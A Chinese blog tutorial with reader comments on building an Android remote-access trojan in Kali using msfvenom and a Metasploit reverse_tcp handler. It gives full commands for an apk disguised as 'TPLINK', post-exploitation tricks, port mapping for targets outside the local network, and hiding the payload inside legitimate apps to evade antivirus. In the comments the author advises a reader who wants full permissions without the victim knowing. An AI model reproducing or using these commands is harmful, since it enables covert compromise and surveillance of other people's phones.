逍遥子

kali下android木马那些事
普通版在kali中我们可以利用msfvenom来生成一个Android木马。命令如下:msfvenom -p an...
扫描右侧二维码阅读全文
25
2018/11

kali下android木马那些事

普通版

kali中我们可以利用msfvenom来生成一个Android木马。命令如下:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.232.195 LPORT=5555 R > TPLINK.apk

这样便生成了一个名为TPLINK.apk的Android木马。
1.png
然后我们配合msfcosole进行攻击即可。

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LPORT 5555
exploit

手机端安装并执行,成功获得shell。

一些另外的玩法

给手机播放视频和音频文件(需更新到最新版的msf)

命令格式: paly /root/xxx.mp3 mp4
2.png

修改手机壁纸

background
use post/multi/manage/set_wallpaper
sessions
set sessions id
set WALLPAPER_FILE JPG
exploit

晋级玩法

利用armitage图形化管理工具
3.png

可视化的文件管理

4.png

骨灰级

外网木马

我们可以利用花生壳进行端口映射完成外网木马的渗透测试,添加端口如下!
5.png
然后在kali中设置花生壳的端口和ip地址即可。
那么!你还有那些另类的玩法呢?一起在下方交流吧。

木马免杀

对于以上的木马,是无法通过杀毒软件的查杀的,我们可以将payload加入到正常的APP中,来起来免杀的效果。
命令:

msfvenom -p -x test.apk android/meterpreter/reverse_tcp LHOST=192.168.232.195 LPORT=5555 R > kali.apk

命令详解:
-x: 后跟原生态app
生成的kali.apk为新的木马文件。

视频演示

Last modification:December 30th, 2018 at 05:55 pm
正在沿街乞讨中……

Leave a Comment

29 comments

  1. 尴尬死了我是尴尬哥 Safari 604.1 iPhone 12.3.1 中国 江苏 扬州

    普通版的应用程是什么,msfvenom是不是就是普通的终端。

    1. 逍遥子 Google Chrome 72.0.3626.121 Windows 7 中国 北京 北京
      @尴尬死了我是尴尬哥

      普通的就是只能内网玩,不能免杀!

  2. 尴尬死了我是尴尬哥 Safari 604.1 iPhone 12.3.1 中国 浙江 金华

    请问我在手机上运行了木马,可是我的kali终端没有反应,是不是我的电脑有问题还是我的操作问题?

    1. 逍遥子 搜狗浏览器 Build Android 9 中国 北京 北京
      @尴尬死了我是尴尬哥

      手机和kali不在同一网段造成的!参考文章https://bbskali.cn/forum.php?mod=viewthread&tid=1728&mobile=2

  3. 尴尬死了我是尴尬哥 Safari 604.1 iPhone 12.3.1 中国 浙江 金华

    为什么我在手机运行了可是我的kali linux终端没有反应

  4. 马云:今天你充钱了吗? QQ浏览器 6.2 Android 7.0 中国 北京 北京

    怎么在kali中设置 花生壳端口映射?

    1. 逍遥子 搜狗浏览器 Build Android 9 中国 北京 北京
      @马云:今天你充钱了吗?

      生成木马填写花生壳的IP和端口!配置msf时填写内网的IP和端口!

      1. 马云:今天你充钱了吗? QQ浏览器 6.2 Android 7.0 中国 北京 北京
        @逍遥子

        为啥不行?可以加下你扣吗?

      2. 马云:今天你充钱了吗? QQ浏览器 6.2 Android 7.0 中国 北京 北京
        @逍遥子

        花生壳的ip和端口就是在添加时设置的ip和端口吗?

  5. 嗯嗯 微信 7.0.4 iPhone 12.3.1 中国 江苏 扬州

    有iOS的嘛

    1. 逍遥子 搜狗浏览器 Build Android 9 中国 北京 北京
      @嗯嗯

      没有的

  6. 微信 7.0.4 iPhone 12.3.1 中国 江苏 扬州

    手机要填IP吗

    1. 逍遥子 Google Chrome 72.0.3626.121 Windows 7 中国 江苏 扬州
      @嗯

      不需要!

  7. MR.ROBOT 非主流浏览器 非主流操作系统 GOOGLE.COM GOOGLE.COM

    想问问怎么给apk加后门

  8. 爱走路的鹰 非主流浏览器 非主流操作系统 GOOGLE.COM GOOGLE.COM

    ,,

  9. Alva QQ浏览器 6.2 Android 6.0.1 中国 江苏 徐州

    大佬你好,有个问题哈,exploit之后,只有第一行,没有第二行Starting the payload handler 提示,这是咋回事啊?网络已桥接,,

    1. 逍遥子 搜狗浏览器 Build Android 8.1.0 中国 甘肃 陇南
      @Alva

      你好,生成木马用的IP地址必须为kali的IP。不是手机的IP。同时在msf中填写的IP和端口也要和生成木马时填写的相同!

      1. 杰哥哥 搜狗浏览器 Build Android 9 中国 北京 北京
        @逍遥子

        需要无线网卡吗

        1. 逍遥子 Google Chrome 72.0.3626.121 Windows 7 中国 北京 北京
          @杰哥哥

          不需要,在同一局域网就可以了。

          1. 杰哥哥 搜狗浏览器 Build Android 9 中国 山东 青岛
            @逍遥子

            为什么到最后就显示一行?

      2. duyukun Google Chrome 63.0.3239.132 Windows 7 中国 陕西 西安
        @逍遥子

        生成之后我安装了,在手机上点击没有反应是为什么呀??还有就是虚拟机连网用什么模式,桥接还是NAT??再者就是我set LHOST和set LPORT之后用另一个控制台打开show options看到的是没有set之前的配置,为什么呀??求解,谢谢。

        1. 逍遥子 搜狗浏览器 Build Android 8.1.0 中国 甘肃
          @duyukun

          你好,msf生成的木马点了之后是没反应的,但是后台可以得到shell

        2. duyukun Google Chrome 63.0.3239.132 Windows 7 中国 陕西 西安
          @duyukun

          请求回信,上面的问题解决了,好像只能桥接模式,但是我安装上之后没有权限,手动开的,有什么方法能让对方不知道,并且权限都是允许的?VX:dyk15829298797

          1. 逍遥子 搜狗浏览器 Build Android 8.1.0 中国 甘肃
            @duyukun

            你好,这是通病,你可以尝试给正常的APP中加入注入脚本!

  10. 北海一刀 Edge 17.17134 Windows 10 中国 甘肃 陇南

    很基础的教程,感谢博主分享。

  11. poner 非主流浏览器 非主流操作系统 GOOGLE.COM GOOGLE.COM

    超过18M的原生apk无法生成新的apk文件

  12. 邹宇浩 非主流浏览器 非主流操作系统 GOOGLE.COM GOOGLE.COM

    哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈

  13. www QQ浏览器 6.2 Android 7.1.2 中国 陕西

    msfvenom -p -x test.apk android/meterpreter/reverse_tcp LHOST=192.168.232.195 LPORT=5555 R > kali.apk实验时一直Invalid Payload Selected

    1. priess 搜狗浏览器 Build Android 8.1.0 中国 甘肃 陇南
      @www

      把test.apk换成你自己的apk文件。